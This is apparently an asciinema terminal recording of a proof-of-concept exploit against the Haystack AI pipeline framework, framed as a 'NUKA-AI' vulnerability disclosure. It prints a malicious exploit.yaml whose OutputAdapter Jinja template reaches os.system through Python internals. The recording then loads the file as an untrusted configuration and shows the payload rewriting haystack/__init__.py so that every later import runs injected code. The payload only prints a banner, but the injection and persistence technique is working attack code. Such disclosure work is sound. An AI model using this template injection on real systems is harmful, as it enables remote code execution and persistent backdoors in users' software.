[38.53155, "o", "+ echo -e '\\e[1;33m>>> [STEP 2] Creating '\\''exploit.yaml'\\'' (The Trojan Horse)\\e[0m'\r\n\u001b[1;33m>>> [STEP 2] Creating 'exploit.yaml' (The Trojan Horse)\u001b[0m\r\n+ cat\r\n"]

[38.538344, "o", "+ echo -e '\\e[1;36m>>> [CONTENT VIEW] Reviewing Malicious YAML Payload:\\e[0m'\r\n\u001b[1;36m>>> [CONTENT VIEW] Reviewing Malicious YAML Payload:\u001b[0m\r\n"]

[38.538423, "o", "+ cat exploit.yaml\r\n"]

[38.543013, "o", "components:"]

[38.545701, "o", "\r\n adapter:\r\n type: haystack.components.converters.output_adapter.OutputAdapter\r\n init_parameters:\r\n template: |\r\n {{ trigger }}{{ self.__init__.__globals__.__builtins__.__import__('os').system('echo \"print(\\\"\\\\\\\"!!! NUKA-AI YAML SCOPE CHANGE: 10.0 CRITICAL !!!\\\\\\\"\\\")\" >> /usr/local/lib/python3.11/site-packages/haystack/__init__.py') }}\r\n output_type: str\r\n unsafe: true\r\nconnections: []\r\ninputs: {}\r\noutputs: {}\r\n"]

[38.546542, "o", "+ docker cp exploit.yaml haystack-instance:/tmp/exploit.yaml\r\n"]

[38.580915, "o", "Successfully copied 2.05kB to haystack-instance:/tmp/exploit.yaml\r\n"]

[38.585696, "o", "+ echo -e '\\e[1;32m>>> [STEP 3] Verifying Clean System State\\e[0m'"]

[38.586345, "o", "\r\n"]

[38.58647, "o", "\u001b[1;32m>>> [STEP 3] Verifying Clean System State\u001b[0m\r\n+ docker exec haystack-instance python3 -c 'import haystack; print('\\''STATUS: Framework is untainted.'\\'')'"]

[38.586522, "o", "\r\n"]

[39.571143, "o", "STATUS: Framework is untainted.\r\n"]

[39.690977, "o", "+ echo -e '\\e[1;31m>>> [STEP 4] Victim App: Loading Untrusted YAML Configuration\\e[0m'\r\n"]

[39.691296, "o", "\u001b[1;31m>>> [STEP 4] Victim App: Loading Untrusted YAML Configuration\u001b[0m"]

[39.691567, "o", "\r\n+ docker exec haystack-instance python3 -c '\r\nimport yaml\r\nfrom haystack import Pipeline\r\nwith open('\\''/tmp/exploit.yaml'\\'', '\\''r'\\'') as f:\r\n data = yaml.safe_load(f)\r\npipe = Pipeline.from_dict(data)\r\nprint('\\''Pipeline initialized. Running trigger...'\\'')\r\npipe.run(data={'\\''adapter'\\'': {'\\''trigger'\\'': '\\''fire'\\''}})\r\n'\r\n"]

[40.757102, "o", "Unsafe mode is enabled. This allows execution of arbitrary code in the Jinja template. Use this only if you trust the source of the template."]

[40.75911, "o", "\r\n"]

[41.902279, "o", "Pipeline initialized. Running trigger...\r\n"]

[41.957639, "o", "+ echo -e '\\e[1;33m>>> [STEP 5] Forensic Check: Modified Framework Files on Disk\\e[0m'\r\n\u001b[1;33m>>> [STEP 5] Forensic Check: Modified Framework Files on Disk\u001b[0m\r\n+ docker exec haystack-instance tail -n 3 /usr/local/lib/python3.11/site-packages/haystack/__init__.py\r\n"]

[42.112968, "o", " \"default_to_dict\",\r\n]\r\nprint(\"!!! NUKA-AI YAML SCOPE CHANGE: 10.0 CRITICAL !!!\")\r\n"]

[42.122615, "o", "+ echo -e '\\e[1;31m>>> [STEP 6] SCOPE CHANGE PROOF: Every new process is now backdoored.\\e[0m'\r\n\u001b[1;31m>>> [STEP 6] SCOPE CHANGE PROOF: Every new process is now backdoored.\u001b[0m\r\n+ docker exec haystack-instance python3 -c 'import haystack; print('\\''--- VERIFICATION COMPLETE ---'\\'')'\r\n"]

[42.781716, "o", "!!! NUKA-AI YAML SCOPE CHANGE: 10.0 CRITICAL !!!\r\n--- VERIFICATION COMPLETE ---\r\n"]

[42.900379, "o", "+ set +x\r\n\u001b[1;31m\r\n====================================================\r\n VULNERABILITY: PERSISTENT RCE VIA YAML DESERIAL \r\n PROJECT: NUKA-AI | CVSS SCORE: 10.0 (CRITICAL) \r\n STATUS: SCOPE CHANGE & PERSISTENCE CONFIRMED \r\n====================================================\r\n\u001b[0m\r\nexit\r\n"]